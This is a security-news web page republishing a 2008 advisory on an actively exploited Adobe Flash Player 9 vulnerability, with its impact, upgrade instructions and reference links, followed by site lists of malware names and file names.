Infesting you with Virus News

Vulnerabilities

Adobe Flash remote vulnerability (PC1-2008-0440)

Overview

Vulnerability chart	Overview: A vulnerability affecting Adobe Flash Player 9 is to be actively exploited in order to install malicious software. Vulnerable: Adobe Flash Player
Remote Access Unknown patch availability Patch implementation unknown

References to Advisories, Solutions, and Tools

Release date:	2008-05-28
Description:	A vulnerability in Flash Player 9 is being actively exploited. The latest version of Flash Player (9.0.124.0) appears to correct the vulnerability. Analysis indicates that this vulnerability is the same as or similar to the one described in Application Specific Attacks: Leveraging the ActionScript Virtual Machine by Mark Dowd. The vulnerability depends on ActionScript 3.0 which was introduced in Flash Player 9, so previous versions do not appear to be affected. In oredr to exploit this vulnerability, an attacker could provoke a victim to open specially crafted Flash content. Public incident reports (SANS ISC, Symantec ThreatCon) specify that this and possibly other Flash vulnerabilities are to be actively exploited. Attacks likely include multiple web sites, specially crafted Flash content, and obscure JavaScript to induce a victim to browse to a site using the vulnerability in order to install malicious software. Attackers might compromise otherwise reliable web sites that use SQL injection or cross-site scripting vulnerabilities in order to inject JavaScript that sends visitors to malicious Flash content. The vulnerability (or vulnerabilities) being used in these attacks are explained in US-CERT Vulnerability Notes VU#395473 and VU#159523. According to a post on the Adobe Product Security Incident Response Team (PSIRT) blog, the exploit "...appears to be taking advantage of a known vulnerability, reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash Player 9.0.124.0 (CVE-2007-0071)."
Impact:	With the help of this type of vulnerability, a remote, unauthenticated attacker might be allowed to execute arbitrary code. Different sources say that attackers are exploiting this vulnerability in order to install malicious software.
Solution:	Upgrade to Flash Player 9.0.124.0 or later. The installation process for Flash Player differs based on web browser platform. Take care to upgrade Flash Player in all supported web browsers. Microsoft Windows users should upgrade the Flash ActiveX control by visiting the Adobe Flash Player Download Center using Internet Explorer (IE). This is necessary even if IE is not the primary browser, since other programs may use IE to view Flash content. Alternately, download the stand-alone installer for the Flash Player ActiveX control. Users with other web browsers and operating systems should visit the Adobe Flash Player Download Center using each browser that supports Flash. Alternately, download the stand-alone installer for the Flash Player Netscape-style plug-in. To check the version of Flash Player, visit the Version test for Adobe Flash Player using each web browser that supports Flash.
Vulnerable:
References:	http://www.us-cert.gov/reading_room/securing_browser/ http://www.kb.cert.org/vuls/id/395473 http://www.kb.cert.org/vuls/id/159523 http://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.htm http://www.adobe.com/go/getflash http://www.adobe.com/go/tn_15507 http://www.adobe.com/support/security/bulletins/apsb08-11.html http://www.adobe.com/go/full_flashplayer_win_ie http://www.adobe.com/go/full_flashplayer_win http://www.adobe.com/devnet/actionscript/articles/actionscript3_overview.html http://isc.sans.org/diary.html?storyid=4468 http://www.symantec.com/security_response/threatconlearn.jsp https://addons.mozilla.org/addon/722 https://addons.mozilla.org/addon/433 http://documents.iss.net/whitepapers/IBM_X-Force_WP_final.pd

Say something interesting!

Top 10 Malware Threats

1.	Security Monitor
2.	Win 7 Home Security
3.	AV Protection 2012
4.	Privacy Protection
5.	Duqu Trojan
6.	Windows Monitor
7.	Win 7 Home Security
8.	Privacy Protection
9.	Cloud AV 2012

Most searched files

1.	vprot.exe
2.	GameXNGO.exe
3.	setup.ovr
4.	RosebudMUI.msi
5.	fp_ax_cab_installer.exe
6.	phoenix.exe
7.	InfDefaultInstall.exe
8.	AcroPro.msi
9.	FlashUtil11c_ActiveX.exe
10.	WinBootstrapper.msi

Newest files

1.	FlashUtil32_11_2_202_228_ActiveX.exe
2.	sisnicxp.sys
3.	NTIDrvr.sys
4.	int15.sys
5.	anbmServ.exe
6.	E_FATIADA.EXE
7.	HP_IZE.exe
8.	viaagp1.sys
9.	SISAGPX.sys
10.	R8139n51.SYS

Home Tips Downloads Videos Files Virus list Vulnerabilities

Home > Vulnerabilities > pc1-2008-0440